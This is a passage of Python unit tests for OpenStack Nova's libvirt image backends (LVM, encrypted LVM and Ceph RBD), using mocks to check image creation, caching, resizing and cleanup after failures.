mock_create.assert_called_once_with(self.VG, self.LV,
self.TEMPLATE_SIZE,
sparse=sparse)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_get.assert_called_once_with(self.TEMPLATE_PATH)
path = '/dev/%s/%s_%s' % (self.VG, self.INSTANCE.uuid, self.NAME)
mock_convert_image.assert_called_once_with(
self.TEMPLATE_PATH, path, None, 'raw', CONF.instances_path, False)
mock_disk_op_sema.__enter__.assert_called_once()
@mock.patch.object(imagebackend.lvm, 'create_volume')
def _create_image_generated(self, sparse, mock_create):
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH,
self.SIZE, ephemeral_size=None)
mock_create.assert_called_once_with(self.VG, self.LV,
self.SIZE, sparse=sparse)
fn.assert_called_once_with(target=self.PATH, ephemeral_size=None)
@mock.patch.object(compute_utils, 'disk_ops_semaphore')
@mock.patch('nova.privsep.utils.supports_direct_io', return_value=True)
@mock.patch.object(imagebackend.disk, 'resize2fs')
@mock.patch.object(imagebackend.lvm, 'create_volume')
@mock.patch.object(imagebackend.disk, 'get_disk_size',
return_value=TEMPLATE_SIZE)
@mock.patch('nova.privsep.qemu.convert_image')
def _create_image_resize(self, sparse, mock_convert_image, mock_get,
mock_create, mock_resize, mock_ignored,
mock_disk_op_sema):
fn = mock.MagicMock()
fn(target=self.TEMPLATE_PATH)
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_create.assert_called_once_with(self.VG, self.LV,
self.SIZE, sparse=sparse)
mock_get.assert_called_once_with(self.TEMPLATE_PATH)
mock_convert_image.assert_called_once_with(
self.TEMPLATE_PATH, self.PATH, None, 'raw',
CONF.instances_path, False)
mock_disk_op_sema.__enter__.assert_called_once()
mock_resize.assert_called_once_with(self.PATH, run_as_root=True)
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
@mock.patch.object(os.path, 'exists')
def test_cache(self, mock_exists, mock_ensure):
mock_exists.side_effect = [False, False, False]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(os.path, 'exists')
def test_cache_image_exists(self, mock_exists):
mock_exists.side_effect = [True, True, True]
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(None, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
@mock.patch.object(os.path, 'exists', side_effect=[True, False, False])
def test_cache_base_dir_exists(self, mock_exists, mock_ensure):
exist_calls = [mock.call(self.TEMPLATE_DIR),
mock.call(self.PATH),
mock.call(self.TEMPLATE_PATH)]
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_exists.assert_has_calls(exist_calls)
mock_ensure.assert_not_called()
@mock.patch('os.path.exists', autospec=True)
@mock.patch('nova.utils.synchronized', autospec=True)
@mock.patch.object(imagebackend, 'lvm', autospec=True)
@mock.patch.object(imagebackend.fileutils, 'ensure_tree', autospec=True)
def test_cache_ephemeral(self, mock_ensure, mock_lvm, mock_synchronized,
mock_exists):
# Ignores its arguments and returns the wrapped function unmodified
def fake_synchronized(*args, **kwargs):
def outer(fn):
def wrapper(*wargs, **wkwargs):
fn(*wargs, **wkwargs)
return wrapper
return outer
mock_synchronized.side_effect = fake_synchronized
# Fake exists returns true for paths which have been added to the
# exists set
exists = set()
def fake_exists(path):
return path in exists
mock_exists.side_effect = fake_exists
# Fake create_volume causes exists to return true for the volume
def fake_create_volume(vg, lv, size, sparse=False):
exists.add(os.path.join('/dev', vg, lv))
mock_lvm.create_volume.side_effect = fake_create_volume
# Assert that when we call cache() for an ephemeral disk with the
# Lvm backend, we call fetch_func with a target of the Lvm disk
size_gb = 1
size = size_gb * units.Gi
fetch_func = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(fetch_func, self.TEMPLATE,
ephemeral_size=size_gb, size=size)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
mock_lvm.create_volume.assert_called_once_with(self.VG, self.LV, size,
sparse=False)
fetch_func.assert_called_once_with(target=self.PATH,
ephemeral_size=size_gb)
mock_synchronized.assert_called()
def test_create_image(self):
self._create_image(False)
def test_create_image_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image(True)
def test_create_image_generated(self):
self._create_image_generated(False)
def test_create_image_generated_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image_generated(True)
def test_create_image_resize(self):
self._create_image_resize(False)
def test_create_image_resize_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image_resize(True)
@mock.patch.object(imagebackend.lvm, 'create_volume',
side_effect=RuntimeError)
@mock.patch.object(imagebackend.disk, 'get_disk_size',
return_value=TEMPLATE_SIZE)
@mock.patch.object(imagebackend.lvm, 'remove_volumes')
def test_create_image_negative(self, mock_remove, mock_get, mock_create):
fn = mock.MagicMock()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(RuntimeError, image.create_image, fn,
self.TEMPLATE_PATH, self.SIZE)
mock_create.assert_called_once_with(self.VG, self.LV,
self.SIZE, sparse=False)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_get.assert_called_once_with(self.TEMPLATE_PATH)
mock_remove.assert_called_once_with([self.PATH])
@mock.patch.object(imagebackend.lvm, 'create_volume')
@mock.patch.object(imagebackend.lvm, 'remove_volumes')
def test_create_image_generated_negative(self, mock_remove, mock_create):
fn = mock.MagicMock()
fn.side_effect = RuntimeError
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(RuntimeError, image.create_image, fn,
self.TEMPLATE_PATH, self.SIZE,
ephemeral_size=None)
mock_create.assert_called_once_with(self.VG, self.LV, self.SIZE,
sparse=False)
fn.assert_called_once_with(target=self.PATH, ephemeral_size=None)
mock_remove.assert_called_once_with([self.PATH])
def test_prealloc_image(self):
CONF.set_override('preallocate_images', 'space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('nova.virt.libvirt.imagebackend.Lvm.exists',
lambda *a, **kw: True)
self.stub_out('nova.virt.libvirt.imagebackend.Lvm.get_disk_size',
lambda *a, **kw: self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(), [])
class EncryptedLvmTestCase(_ImageTestCase, test.NoDBTestCase):
VG = 'FakeVG'
TEMPLATE_SIZE = 512
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Lvm
super(EncryptedLvmTestCase, self).setUp()
self.flags(enabled=True, group='ephemeral_storage_encryption')
self.flags(cipher='aes-xts-plain64',
group='ephemeral_storage_encryption')
self.flags(key_size=512, group='ephemeral_storage_encryption')
self.flags(fixed_key='00000000000000000000000000000000'
'00000000000000000000000000000000',
group='key_manager')
self.flags(images_volume_group=self.VG, group='libvirt')
self.LV = '%s_%s' % (self.INSTANCE['uuid'], self.NAME)
self.LV_PATH = os.path.join('/dev', self.VG, self.LV)
self.PATH = os.path.join('/dev/mapper',
imagebackend.dmcrypt.volume_name(self.LV))
self.key_manager = key_manager.API()
self.INSTANCE['ephemeral_key_uuid'] =\
self.key_manager.create_key(self.CONTEXT, 'AES', 256)
self.KEY = self.key_manager.get(self.CONTEXT,
self.INSTANCE['ephemeral_key_uuid']).get_encoded()
self.lvm = imagebackend.lvm
self.disk = imagebackend.disk
self.utils = imagebackend.utils
self.libvirt_utils = imagebackend.libvirt_utils
self.dmcrypt = imagebackend.dmcrypt
def _create_image(self, sparse):
with test.nested(
mock.patch('nova.privsep.utils.supports_direct_io',
return_value=True),
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('nova.privsep.qemu.convert_image'),
mock.patch.object(compute_utils, 'disk_ops_semaphore')):
fn = mock.Mock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.TEMPLATE_SIZE,
context=self.CONTEXT)
compute_utils.disk_ops_semaphore.__enter__.assert_called_once()
fn.assert_called_with(context=self.CONTEXT,
target=self.TEMPLATE_PATH)
self.lvm.create_volume.assert_called_with(self.VG,
self.LV,
self.TEMPLATE_SIZE,
sparse=sparse)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
nova.privsep.qemu.convert_image.assert_called_with(
self.TEMPLATE_PATH, self.PATH, None, 'raw',
CONF.instances_path, False)
def _create_image_generated(self, sparse):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('nova.privsep.qemu.convert_image')):
fn = mock.Mock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH,
self.SIZE,
ephemeral_size=None,
context=self.CONTEXT)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=sparse)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
fn.assert_called_with(target=self.PATH,
ephemeral_size=None, context=self.CONTEXT)
def _create_image_resize(self, sparse):
with test.nested(
mock.patch('nova.privsep.utils.supports_direct_io',
return_value=True),
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('nova.privsep.qemu.convert_image'),
mock.patch.object(compute_utils, 'disk_ops_semaphore')):
fn = mock.Mock()
image = self.image_class(self.INSTANCE, self.NAME)
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE,
context=self.CONTEXT)
compute_utils.disk_ops_semaphore.__enter__.assert_called_once()
fn.assert_called_with(context=self.CONTEXT,
target=self.TEMPLATE_PATH)
self.disk.get_disk_size.assert_called_with(self.TEMPLATE_PATH)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=sparse)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
nova.privsep.qemu.convert_image.assert_called_with(
self.TEMPLATE_PATH, self.PATH, None, 'raw',
CONF.instances_path, False)
self.disk.resize2fs.assert_called_with(self.PATH, run_as_root=True)
def test_create_image(self):
self._create_image(False)
def test_create_image_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image(True)
def test_create_image_generated(self):
self._create_image_generated(False)
def test_create_image_generated_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image_generated(True)
def test_create_image_resize(self):
self._create_image_resize(False)
def test_create_image_resize_sparsed(self):
self.flags(sparse_logical_volumes=True, group='libvirt')
self._create_image_resize(True)
def test_create_image_negative(self):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('oslo_concurrency.processutils.execute',
mock.Mock())):
fn = mock.Mock()
self.lvm.create_volume.side_effect = RuntimeError()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(
RuntimeError,
image.create_image,
fn,
self.TEMPLATE_PATH,
self.SIZE,
context=self.CONTEXT)
fn.assert_called_with(
context=self.CONTEXT,
target=self.TEMPLATE_PATH)
self.disk.get_disk_size.assert_called_with(
self.TEMPLATE_PATH)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=False)
self.dmcrypt.delete_volume.assert_called_with(
self.PATH.rpartition('/')[2])
self.lvm.remove_volumes.assert_called_with([self.LV_PATH])
def test_create_image_encrypt_negative(self):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('oslo_concurrency.processutils.execute',
mock.Mock())):
fn = mock.Mock()
self.dmcrypt.create_volume.side_effect = RuntimeError()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(
RuntimeError,
image.create_image,
fn,
self.TEMPLATE_PATH,
self.SIZE,
context=self.CONTEXT)
fn.assert_called_with(
context=self.CONTEXT,
target=self.TEMPLATE_PATH)
self.disk.get_disk_size.assert_called_with(self.TEMPLATE_PATH)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=False)
self.dmcrypt.create_volume.assert_called_with(
self.dmcrypt.volume_name(self.LV),
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
self.dmcrypt.delete_volume.assert_called_with(
self.PATH.rpartition('/')[2])
self.lvm.remove_volumes.assert_called_with([self.LV_PATH])
def test_create_image_generated_negative(self):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('oslo_concurrency.processutils.execute',
mock.Mock())):
fn = mock.Mock()
fn.side_effect = RuntimeError()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(RuntimeError,
image.create_image,
fn,
self.TEMPLATE_PATH,
self.SIZE,
ephemeral_size=None,
context=self.CONTEXT)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=False)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
fn.assert_called_with(
target=self.PATH,
ephemeral_size=None,
context=self.CONTEXT)
self.dmcrypt.delete_volume.assert_called_with(
self.PATH.rpartition('/')[2])
self.lvm.remove_volumes.assert_called_with([self.LV_PATH])
def test_create_image_generated_encrypt_negative(self):
with test.nested(
mock.patch.object(self.lvm, 'create_volume', mock.Mock()),
mock.patch.object(self.lvm, 'remove_volumes', mock.Mock()),
mock.patch.object(self.disk, 'resize2fs', mock.Mock()),
mock.patch.object(self.disk, 'get_disk_size',
mock.Mock(return_value=self.TEMPLATE_SIZE)),
mock.patch.object(self.dmcrypt, 'create_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'delete_volume', mock.Mock()),
mock.patch.object(self.dmcrypt, 'list_volumes', mock.Mock()),
mock.patch('oslo_concurrency.processutils.execute',
mock.Mock())):
fn = mock.Mock()
fn.side_effect = RuntimeError()
image = self.image_class(self.INSTANCE, self.NAME)
self.assertRaises(
RuntimeError,
image.create_image,
fn,
self.TEMPLATE_PATH,
self.SIZE,
ephemeral_size=None,
context=self.CONTEXT)
self.lvm.create_volume.assert_called_with(
self.VG,
self.LV,
self.SIZE,
sparse=False)
self.dmcrypt.create_volume.assert_called_with(
self.PATH.rpartition('/')[2],
self.LV_PATH,
CONF.ephemeral_storage_encryption.cipher,
CONF.ephemeral_storage_encryption.key_size,
self.KEY)
self.dmcrypt.delete_volume.assert_called_with(
self.PATH.rpartition('/')[2])
self.lvm.remove_volumes.assert_called_with([self.LV_PATH])
def test_prealloc_image(self):
self.flags(preallocate_images='space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('nova.virt.libvirt.imagebackend.Lvm.exists',
lambda *a, **kw: True)
self.stub_out('nova.virt.libvirt.imagebackend.Lvm.get_disk_size',
lambda *a, **kw: self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(), [])
def test_get_model(self):
image = self.image_class(self.INSTANCE, self.NAME)
model = image.get_model(FakeConn())
self.assertEqual(imgmodel.LocalBlockImage(self.PATH),
model)
@ddt.ddt
class RbdTestCase(_ImageTestCase, test.NoDBTestCase):
FSID = "FakeFsID"
POOL = "FakePool"
USER = "FakeUser"
CONF = "FakeConf"
SIZE = 1024
def setUp(self):
self.image_class = imagebackend.Rbd
super(RbdTestCase, self).setUp()
self.flags(images_rbd_pool=self.POOL,
rbd_user=self.USER,
images_rbd_ceph_conf=self.CONF,
group='libvirt')
self.libvirt_utils = imagebackend.libvirt_utils
self.utils = imagebackend.utils
# mock out the cephclients for avoiding ImportError exception
rbd_utils.rbd = mock.Mock()
rbd_utils.rados = mock.Mock()
@mock.patch.object(os.path, 'exists', return_value=False)
@mock.patch.object(imagebackend.Rbd, 'exists', return_value=False)
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
def test_cache(self, mock_ensure, mock_img_exist, mock_os_exist):
image = self.image_class(self.INSTANCE, self.NAME)
fn = mock.MagicMock()
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_ensure.assert_called_once_with(self.TEMPLATE_DIR)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
mock_img_exist.assert_called_with()
mock_os_exist.assert_has_calls([
mock.call(self.TEMPLATE_DIR), mock.call(self.TEMPLATE_PATH)
])
@mock.patch.object(os.path, 'exists')
@mock.patch.object(imagebackend.Rbd, 'exists')
@mock.patch.object(imagebackend.fileutils, 'ensure_tree')
def test_cache_base_dir_exists(self, mock_ensure,
mock_img_exist, mock_os_exist):
mock_os_exist.side_effect = [True, False]
mock_img_exist.return_value = False
image = self.image_class(self.INSTANCE, self.NAME)
fn = mock.MagicMock()
self.mock_create_image(image)
image.cache(fn, self.TEMPLATE)
mock_img_exist.assert_called_once_with()
mock_os_exist.assert_has_calls([
mock.call(self.TEMPLATE_DIR), mock.call(self.TEMPLATE_PATH)
])
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
@mock.patch.object(os.path, 'exists', return_value=True)
@mock.patch.object(imagebackend.Rbd, 'exists', return_value=True)
def test_cache_image_exists(self, mock_img_exist, mock_os_exist):
image = self.image_class(self.INSTANCE, self.NAME)
image.cache(None, self.TEMPLATE)
mock_img_exist.assert_called_once_with()
mock_os_exist.assert_has_calls([
mock.call(self.TEMPLATE_DIR), mock.call(self.TEMPLATE_PATH)
])
@mock.patch.object(os.path, 'exists')
@mock.patch.object(imagebackend.Rbd, 'exists')
def test_cache_template_exists(self, mock_img_exist, mock_os_exist):
mock_os_exist.return_value = True
mock_img_exist.return_value = False
image = self.image_class(self.INSTANCE, self.NAME)
self.mock_create_image(image)
image.cache(None, self.TEMPLATE)
mock_img_exist.assert_called_once_with()
mock_os_exist.assert_has_calls([
mock.call(self.TEMPLATE_DIR), mock.call(self.TEMPLATE_PATH)
])
@mock.patch.object(imagebackend.Rbd, 'exists')
def test_create_image(self, mock_exists):
fn = mock.MagicMock()
rbd_utils.rbd.RBD_FEATURE_LAYERING = 1
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
mock_exists.return_value = False
image.create_image(fn, self.TEMPLATE_PATH, None)
rbd_name = "%s_%s" % (self.INSTANCE['uuid'], self.NAME)
cmd = ('rbd', 'import', '--pool', self.POOL, self.TEMPLATE_PATH,
rbd_name, '--image-format=2', '--id', self.USER,
'--conf', self.CONF)
self.assertEqual(fake_processutils.fake_execute_get_log(),
[' '.join(cmd)])
mock_exists.assert_has_calls([mock.call(), mock.call()])
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
@mock.patch.object(images, 'qemu_img_info')
@mock.patch.object(os.path, 'exists', return_value=False)
def test__remove_non_raw_cache_image_not_exists(
self, mock_exists, mock_qemu):
image = self.image_class(self.INSTANCE, self.NAME)
image._remove_non_raw_cache_image(self.TEMPLATE_PATH)
mock_qemu.assert_not_called()
@mock.patch.object(os, 'remove')
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch.object(os.path, 'exists', return_value=True)
def test__remove_non_raw_cache_image_with_raw_cache(
self, mock_exists, mock_qemu, mock_remove):
mock_qemu.return_value.file_format = 'raw'
image = self.image_class(self.INSTANCE, self.NAME)
image._remove_non_raw_cache_image(self.TEMPLATE_PATH)
mock_remove.assert_not_called()
@mock.patch.object(os, 'remove')
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch.object(os.path, 'exists', return_value=True)
def test__remove_non_raw_cache_image_with_qcow2_cache(
self, mock_exists, mock_qemu, mock_remove):
mock_qemu.return_value.file_format = 'qcow2'
image = self.image_class(self.INSTANCE, self.NAME)
image._remove_non_raw_cache_image(self.TEMPLATE_PATH)
mock_remove.assert_called_once_with(self.TEMPLATE_PATH)
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch.object(rbd_utils.RBDDriver, 'resize')
@mock.patch.object(imagebackend.Rbd, 'verify_base_size')
@mock.patch.object(imagebackend.Rbd, 'get_disk_size')
@mock.patch.object(imagebackend.Rbd, 'exists')
def test_create_image_resize(self, mock_exists, mock_get,
mock_verify, mock_resize, mock_qemu):
fn = mock.MagicMock()
full_size = self.SIZE * 2
rbd_utils.rbd.RBD_FEATURE_LAYERING = 1
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
mock_exists.return_value = False
mock_qemu.return_value.file_format = 'raw'
mock_get.return_value = self.SIZE
rbd_name = "%s_%s" % (self.INSTANCE['uuid'], self.NAME)
cmd = ('rbd', 'import', '--pool', self.POOL, self.TEMPLATE_PATH,
rbd_name, '--image-format=2', '--id', self.USER,
'--conf', self.CONF)
image.create_image(fn, self.TEMPLATE_PATH, full_size)
self.assertEqual(fake_processutils.fake_execute_get_log(),
[' '.join(cmd)])
mock_exists.assert_has_calls([mock.call(), mock.call()])
mock_get.assert_called_once_with(rbd_name)
mock_resize.assert_called_once_with(rbd_name, full_size)
mock_verify.assert_called_once_with(self.TEMPLATE_PATH, full_size)
fn.assert_called_once_with(target=self.TEMPLATE_PATH)
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
@mock.patch.object(imagebackend.Rbd, 'get_disk_size')
@mock.patch.object(imagebackend.Rbd, 'exists')
def test_create_image_already_exists(self, mock_exists, mock_get,
mock_qemu):
rbd_utils.rbd.RBD_FEATURE_LAYERING = 1
image = self.image_class(self.INSTANCE, self.NAME)
mock_exists.return_value = True
mock_qemu.return_value.file_format = 'raw'
mock_get.return_value = self.SIZE
rbd_name = "%s_%s" % (self.INSTANCE['uuid'], self.NAME)
fn = mock.MagicMock()
image.create_image(fn, self.TEMPLATE_PATH, self.SIZE)
mock_exists.assert_has_calls([mock.call(), mock.call()])
mock_get.assert_has_calls([mock.call(self.TEMPLATE_PATH),
mock.call(rbd_name)])
def test_prealloc_image(self):
CONF.set_override('preallocate_images', 'space')
fake_processutils.fake_execute_clear_log()
fake_processutils.stub_out_processutils_execute(self)
image = self.image_class(self.INSTANCE, self.NAME)
def fake_fetch(target, *args, **kwargs):
return
self.stub_out('os.path.exists', lambda _: True)
self.stub_out('nova.virt.libvirt.imagebackend.Rbd.exists',
lambda *a, **kw: True)
self.stub_out('nova.virt.libvirt.imagebackend.Rbd.get_disk_size',
lambda *a, **kw: self.SIZE)
image.cache(fake_fetch, self.TEMPLATE_PATH, self.SIZE)
self.assertEqual(fake_processutils.fake_execute_get_log(), [])
def test_parent_compatible(self):
self.assertEqual(utils.getargspec(imagebackend.Image.libvirt_info),
utils.getargspec(self.image_class.libvirt_info))
def test_image_path(self):
conf = "FakeConf"
pool = "FakePool"
user = "FakeUser"
self.flags(images_rbd_pool=pool, group='libvirt')
self.flags(images_rbd_ceph_conf=conf, group='libvirt')
self.flags(rbd_user=user, group='libvirt')
image = self.image_class(self.INSTANCE, self.NAME)
rbd_path = "rbd:%s/%s:id=%s:conf=%s" % (pool, image.rbd_name,
user, conf)
self.assertEqual(image.path, rbd_path)
def test_get_disk_size(self):
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image.driver, 'size') as size_mock:
size_mock.return_value = 2361393152
self.assertEqual(2361393152, image.get_disk_size(image.path))
size_mock.assert_called_once_with(image.rbd_name)
@mock.patch.object(images, 'qemu_img_info',
return_value=imageutils.QemuImgInfo())
def test_create_image_too_small(self, mock_qemu):
mock_qemu.return_value.file_format = 'raw'
image = self.image_class(self.INSTANCE, self.NAME)
with mock.patch.object(image, 'driver') as driver_mock:
driver_mock.exists.return_value = True
driver_mock.size.return_value = 2
self.assertRaises(exception.FlavorDiskSmallerThanImage,
image.create_image, mock.MagicMock(),
self.TEMPLATE_PATH, 1)
driver_mock.size.assert_called_once_with(image.rbd_name)
@mock.patch.object(rbd_utils.RBDDriver, "get_mon_addrs")
def test_libvirt_info(self, mock_mon_addrs):
def get_mon_addrs():
hosts = ["server1", "server2"]
ports = ["1899", "1920"]
return hosts, ports
mock_mon_addrs.side_effect = get_mon_addrs
super(RbdTestCase, self).test_libvirt_info()
@ddt.data(5, None)
@mock.patch.object(rbd_utils.RBDDriver, "get_mon_addrs")
def test_libvirt_info_scsi_with_unit(self, disk_unit, mock_mon_addrs):
def get_mon_addrs():
hosts = ["server1", "server2"]
ports = ["1899", "1920"]
return hosts, ports
mock_mon_addrs.side_effect = get_mon_addrs
super(RbdTestCase, self)._test_libvirt_info_scsi_with_unit(disk_unit)
@mock.patch.object(rbd_utils.RBDDriver, "get_mon_addrs")
def test_get_model(self, mock_mon_addrs):
pool = "FakePool"
user = "FakeUser"
self.flags(images_rbd_pool=pool, group='libvirt')
self.flags(rbd_user=user, group='libvirt')
self.flags(rbd_secret_uuid="3306a5c4-8378-4b3c-aa1f-7b48d3a26172",
group='libvirt')
# image.get_model() should always pass strip_brackets=False
# for building proper IPv6 address+ports for libguestfs
def get_mon_addrs(strip_brackets=True):
if strip_brackets:
hosts = ["server1", "server2", "::1"]
else:
hosts = ["server1", "server2", "[::1]"]
ports = ["1899", "1920", "1930"]
return hosts, ports
mock_mon_addrs.side_effect = get_mon_addrs
image = self.image_class(self.INSTANCE, self.NAME)
model = image.get_model(FakeConn())
self.assertEqual(imgmodel.RBDImage(
self.INSTANCE["uuid"] + "_fake.vm",
"FakePool",
"FakeUser",
b"MTIzNDU2Cg==",
["server1:1899", "server2:1920", "[::1]:1930"]),
model)
@mock.patch.object(rbd_utils.RBDDriver, 'parent_info')
@mock.patch.object(rbd_utils.RBDDriver, 'flatten')
def test_flatten(self, mock_flatten, mock_parent_info):
image = self.image_class(self.INSTANCE, self.NAME)
image.flatten()
mock_flatten.assert_called_once_with(image.rbd_name, pool=self.POOL)
mock_parent_info.assert_called_once_with(
image.rbd_name, pool=self.POOL)
@mock.patch.object(imagebackend, 'LOG')
@mock.patch.object(rbd_utils.RBDDriver, 'parent_info')
@mock.patch.object(rbd_utils.RBDDriver, 'flatten')
